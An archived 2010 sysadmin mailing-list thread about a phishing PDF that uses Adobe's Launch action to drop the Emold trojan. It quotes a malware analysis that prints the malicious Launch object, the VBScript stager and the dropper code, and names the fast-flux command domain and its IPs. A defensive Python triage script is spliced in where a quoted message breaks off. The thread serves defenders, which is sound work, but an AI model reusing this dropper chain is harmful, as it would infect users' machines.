Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread Brian Richards
Amusingly, just got an ad from Adobe which encourages us to Interact with 
recipients by sending out PDF forms

http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT

Brian
MCSE and stuff

snip
~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/  ~

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread John Aldrich
A couple of my users got a fake spam / virus alert email overnight that
really contained a malware payload. I saved the zipped attachment out and
scanned it with Vipre, but it didn't find anything until I tried to extract
the contents of the zip file. 

 

John Aldrich
Tile-Tools

 


Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread viperborg
Someone in marketing failed.
Sent from my BlackBerry® smartphone with Nextel Direct Connect



RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Ziots, Edward
Gang, there is another PDF exploit going on that may or may not be hitting your 
places. Credit to Secureworks (tm) for the writeup below. 

See below: 

Ideas: Set up a zone in your DNS called jademason.com, set it to answer with 
127.0.0.1, and clear the cache on your DNS servers accordingly, which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different DNS returns 
on nslookup. 
Also scan all your PDF files; some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:   xx.xx.xx.xx
Address:  xx.xx.xx.xx

Non-authoritative answer:
Name:       jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:       jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com [mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
The email contained a file called doc.pdf. That file was, of course, malicious 
in nature. It used the PDF Launch vulnerability to echo some commands into a 
bat file and then bootstrap itself into running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs &&
      echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs &&
      echo pf=f.ReadAll >> script.vbs &&
      echo s=InStr(pf,"'SS") >> script.vbs &&
      echo e=InStr(pf,"'EE") >> script.vbs &&
      echo s=Mid(pf,s,e-s) >> script.vbs &&
      echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs &&
      echo s = Replace(s,"%","") >> script.vbs &&
      echo z.Write(s) >> script.vbs &&
      script.vbs && batscript.vbs)
 >>
>>

This uses cmd.exe to write some lines of text to a file called script.vbs and 
then executes script.vbs and batscript.vbs. 

Let's look at how script.vbs ends up: 


' script.vbs, as written to disk by the Launch action above
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next, let's look at what's in that tagged section of doc.pdf (which ends up as 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000))
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Emold trojan. This is a generic downloader which can be used to 
install any number of second-stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe, and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, it intends to 
take to mitigate the danger. Its post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, there are 115 known strains (and growing fast) of malware 
for the Mac. That's why we are releasing a VIPRE client for the 
Mac in Q2. They have sold 
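A defender-side triage routine for this dropper pattern, added here as an example and not taken from the Secureworks writeup or any list post: it flags a /Launch action, replays read-only what script.vbs does with the 'SS/'EE markers, and checks whether the embedded c() array starts with the PE "MZ" magic. The sample PDF bytes are constructed; the code assumes the stream is stored uncompressed as in the sample above, so inflate FlateDecode streams before scanning real files.

```python
import re

# Constructed stand-in for doc.pdf carrying the three tell-tales the writeup
# describes: a /Launch action, the %'SS ... %'EE block that script.vbs cuts
# out, and a c(NNN) array whose first bytes are the PE "MZ" header.
SAMPLE_PDF = b"""%PDF-1.4
8 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c echo ...) >> >>
5 0 obj
<< /Length 46 >>
stream
BT /F1 34 Tf 50 500 Td (Important Information doc.pdf) Tj ET
%'SS
%Dim b
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004))
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%'EE
endstream
"""

LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
MARKED_RE = re.compile(rb"%'SS(.*?)%'EE", re.S)
CHR_RE = re.compile(rb"c\((\d{1,3})\)")


def launch_actions(pdf: bytes) -> int:
    """Number of /Launch action dictionaries in the raw PDF bytes."""
    return len(LAUNCH_RE.findall(pdf))


def marked_payload(pdf: bytes) -> bytes:
    """Read-only replay of script.vbs: the text between the 'SS and 'EE
    markers with the '%' comment prefixes removed; empty if absent."""
    m = MARKED_RE.search(pdf)
    return m.group(1).replace(b"%", b"") if m else b""


def decoded_prefix(payload: bytes, n: int = 4) -> bytes:
    """First n c(NNN) entries decoded to bytes (decimal, like VBScript chr)."""
    return bytes(int(v) for v in CHR_RE.findall(payload)[:n])


def triage(pdf: bytes) -> dict:
    """Alertable findings: Launch action, marker block, embedded MZ image."""
    payload = marked_payload(pdf)
    return {
        "launch": launch_actions(pdf) > 0,
        "marker_block": bool(payload),
        "embedded_mz": decoded_prefix(payload, 2) == b"MZ",
    }
```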

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Sean Rector
Thanks, Z!

Sean Rector, MCSE


RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Stu Sjouwerman
We will be releasing a detection for this PDF exploit in a couple of hours.

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  

